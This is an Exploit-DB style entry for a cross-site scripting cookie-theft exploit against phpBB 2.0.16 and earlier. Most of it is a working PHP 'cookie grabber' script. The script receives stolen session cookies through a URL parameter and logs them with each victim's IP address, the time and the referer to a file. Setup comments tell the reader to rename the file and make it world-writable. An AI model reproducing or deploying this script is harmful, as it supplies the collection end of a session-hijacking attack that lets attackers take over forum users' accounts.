phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit cookie grabber

2005-07-13T00:00:00
ID EDB-ID:1103
Type exploitdb
Reporter Sjaak Rake
Modified 2005-07-13T00:00:00

Description

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber). Webapps exploit for php platform

                                        
                                            // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/

&lt;?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'&lt;br&gt; IP: ' .$ip. '&lt;br&gt; Date and Time: ' .$date. '&lt;br&gt; Referer: '.$referer.'&lt;br&gt;&lt;br&gt;&lt;br&gt;');
fclose($fp);
?&gt;

//rename it to cookies.php and create one new file steal.php and chmod it to 777

# milw0rm.com [2005-07-13]